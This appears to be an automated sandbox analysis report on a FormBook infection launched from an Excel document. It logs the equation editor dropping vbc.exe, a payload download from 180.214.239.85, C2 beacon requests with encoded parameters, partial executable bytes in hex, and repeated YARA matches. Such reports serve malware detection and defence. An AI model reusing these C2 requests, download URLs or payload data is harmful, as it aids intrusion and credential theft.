Source: global traffic	HTTP traffic detected: GET /cmsr/?rP=nVytjV1HNt3hMhEp&yPWTYF2P=ujlsVlrzpoa18ID3lc18bZaAxLX0DfE0xdRLh6j3jOxuPYwZm7ST3/5Fs9u0Ms1f4kekUA== HTTP/1.1Host: www.paradisgrp.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cmsr/?yPWTYF2P=Z163eHxziih9zoATqlvcvJ58YKpwfcrh+Tl2ZMFzPk6a2h2CebNQOI6FcYtN0fOfP8d5cg==&rP=nVytjV1HNt3hMhEp HTTP/1.1Host: www.uvoyus.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 27 Sep 2021 12:04:10 GMTServer: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28Last-Modified: Mon, 27 Sep 2021 09:26:10 GMTETag: "a7600-5ccf6b00272b4"Accept-Ranges: bytesContent-Length: 685568Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 cf 8d 51 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 6a 0a 00 00 0a 00 00 00 00 00 00 ee 88 0a 00 00 20 00 00 00 a0 0a 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 0a 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 9c 88 0a 00 4f 00 00 00 00 a0 0a 00 60 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 0a 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 04 69 0a 00 00 20 00 00 00 6a 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 60 06 00 00 00 a0 0a 00 00 08 00 00 00 6c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 0a 00 00 02 00 00 00 74 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 88 0a 00 00 00 00 00 48 00 00 00 02 00 05 00 dc 43 02 00 f0 f2 00 00 03 00 00 00 01 01 00 06 cc 36 03 00 d0 51 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 22 02 03 7d 01 00 00 04 2a 1e 02 7b 01 00 00 04 2a 22 02 03 7d 02 00 00 04 2a 1e 02 7b 02 00 00 04 2a 22 02 03 7d 03 00 00 04 2a 1e 02 7b 03 00 00 04 2a 22 02 03 7d 04 00 00 04 2a 1e 02 7b 04 00 00 04 2a 22 02 03 7d 05 00 00 04 2a 1e 02 7b 05 00 00 04 2a 22 02 03 7d 06 00 00 04 2a 1e 02 7b 06 00 00 04 2a 22 02 03 7d 07 00 00 04 2a 1e 02 7b 07 00 00 04 2a 22 02 03 7d 08 00 00 04 2a 1e 02 7b 08 00 00 04 2a 22 02 03 7d 09 00 00 04 2a 1e 02 7b 09 00 00 04 2a 22 02 03 7d 0a 00 00 04 2a 1e 02 7b 0a 00 00 04 2a 22 02 03 7d 0b 00 00 04 2a 1e 02 7b 0b 00 00 04 2a 22 02 03 7d 0c 00 00 04 2a 1e 02 7b 0c 00 00 04 2a 22 02 03 7d 0d 00 00 04 2a 1e 02 7b 0d 00 00 04 2a 22 02 03 7d 0e 00 00 04 2a 1e 02 7b 0e 00 00 04 2a 22 02 03 7d 0f 00 00 04 2a 1e 02 7b 0f 00 00 04 2a 22 02 03 7d 10 00 00 04 2a 1e 02 7b 10 00 00 04 2a 13 30 02 00 71 00 00 00 00 00 00 00 02 28 17 00 00 0a 00 00 02 16 28 1

Source: global traffic

HTTP traffic detected: GET /service/rundll32.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 180.214.239.85Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.85

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 Sep 2021 12:05:31 GMTServer: ApacheVary: accept-language,accept-charsetUpgrade: h2Connection: Upgrade, closeAccept-Ranges: bytesTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Content-Language: enData Raw: 63 38 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 33 0d 0a 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 0d 0a 33 38 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 31 31 31 0d 0a 77 65 62 6d 61 73 74 65 72 40 70 61 72 61 64 69 73 67 72 70 2e 63 6f 6d 22 20 2f 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 2f 2a 2d 2d 3e 3c 21 5b 43 44 41 54 41 5b 2f 2a 3e 3c 21 2d 2d 2a 2f 20 0a 20 20 20 20 62 6f 64 79 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0a 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 43 43 3b 20 7d 0a 20 20 20 20 70 2c 20 61 64 64 72 65 73 73 20 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 65 6d 3b 7d 0a 20 20 20 20 73 70 61 6e 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 73 6d 61 6c 6c 65 72 3b 7d 0a 2f 2a 5d 5d 3e 2a 2f 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 0d 0a 31 62 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 68 31 3e 0a 3c 70 3e 0a 0d 0a 33 39 0d 0a 0a 0a 20 20 20 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 0a 20 20 0d 0a 35 37 0d 0a 0a 0a 20 20 20 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 0a 20 20 20 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 0a 0a 20 20 0d 0a 32 0d 0a 0a 0a 0d 0a 39 0d 0a 3c 2f 70 3e 0a 3c 70 3e 0a 0d 0a 34 38 0d 0a 49 66 20 79 6f 75 20 74 68 69 6e 6b 20 74 68 69 73 20 69 73 20 61 20 73 65 72 76 65 72 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 0a 74 68 65 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 32 39 0d 0a 77 65 62 6d 61 73 74 65 72 40 70 61 72 61 64 69 73 67 72 70 2e 63 6f 6

Source: explorer.exe, 00000006.00000000.531839524.0000000002AE0000.00000002.00020000.sdmp

String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)

Source: explorer.exe, 00000006.00000000.534606050.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000006.00000000.531839524.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000006.00000000.531839524.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000006.00000000.493259044.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: http://java.sun.com
Source: explorer.exe, 00000006.00000000.487484798.0000000002CC7000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 00000006.00000000.487484798.0000000002CC7000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: explorer.exe, 00000006.00000000.532973112.0000000003E50000.00000002.00020000.sdmp	String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000006.00000000.487484798.0000000002CC7000.00000002.00020000.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000006.00000000.534606050.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000006.00000000.534606050.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000006.00000000.487484798.0000000002CC7000.00000002.00020000.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: explorer.exe, 00000006.00000000.530688122.0000000001BE0000.00000002.00020000.sdmp, msiexec.exe, 00000008.00000002.666125665.0000000002170000.00000002.00020000.sdmp	String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000006.00000000.493259044.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3
Source: explorer.exe, 00000006.00000000.534606050.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000006.00000000.531839524.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000006.00000000.487484798.0000000002CC7000.00000002.00020000.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000006.00000000.534606050.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000006.00000000.531839524.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000006.00000000.530438928.00000000002C7000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000006.00000000.530438928.00000000002C7000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000006.00000000.531839524.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 00000006.00000000.493259044.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: https://support.mozilla.org
Source: explorer.exe, 00000006.00000000.493259044.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: https://www.mozilla.org
Source: explorer.exe, 00000006.00000000.493259044.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CC400E1B.emf

Jump to behavior

Source: unknown

DNS traffic detected: queries for: www.paradisgrp.com

Source: global traffic	HTTP traffic detected: GET /service/rundll32.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 180.214.239.85Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cmsr/?rP=nVytjV1HNt3hMhEp&yPWTYF2P=ujlsVlrzpoa18ID3lc18bZaAxLX0DfE0xdRLh6j3jOxuPYwZm7ST3/5Fs9u0Ms1f4kekUA== HTTP/1.1Host: www.paradisgrp.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cmsr/?yPWTYF2P=Z163eHxziih9zoATqlvcvJ58YKpwfcrh+Tl2ZMFzPk6a2h2CebNQOI6FcYtN0fOfP8d5cg==&rP=nVytjV1HNt3hMhEp HTTP/1.1Host: www.uvoyus.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.665284451.0000000000090000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.498261649.0000000008065000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.506956230.0000000000250000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.507081132.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.491984403.0000000008065000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.665518307.0000000000280000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.665436706.00000000001F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.507006682.0000000000300000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.467257018.00000000034B9000.00000004.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.665284451.0000000000090000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.665284451.0000000000090000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.498261649.0000000008065000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.498261649.0000000008065000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.506956230.0000000000250000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.506956230.0000000000250000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.507081132.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.507081132.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.491984403.0000000008065000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.491984403.0000000008065000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.665518307.0000000000280000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.665518307.0000000000280000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.665436706.00000000001F0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.665436706.00000000001F0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.507006682.0000000000300000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.507006682.0000000000300000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.467257018.00000000034B9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.467257018.00000000034B9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Show sources

Source: Screenshot number: 4

Screenshot OCR: Enable Editing from the 16 ' 000g" " . - yellow bar above 17 ""-t This document is 3. Once you ha

Office equation editor drops PE file

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\rundll32[1].exe			Jump to dropped file

Source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.665284451.0000000000090000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.665284451.0000000000090000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.498261649.0000000008065000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.498261649.0000000008065000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.506956230.0000000000250000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.506956230.0000000000250000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.507081132.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.507081132.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.491984403.0000000008065000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.491984403.0000000008065000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.665518307.0000000000280000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.665518307.0000000000280000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.665436706.00000000001F0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.665436706.00000000001F0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.507006682.0000000000300000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.507006682.0000000000300000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
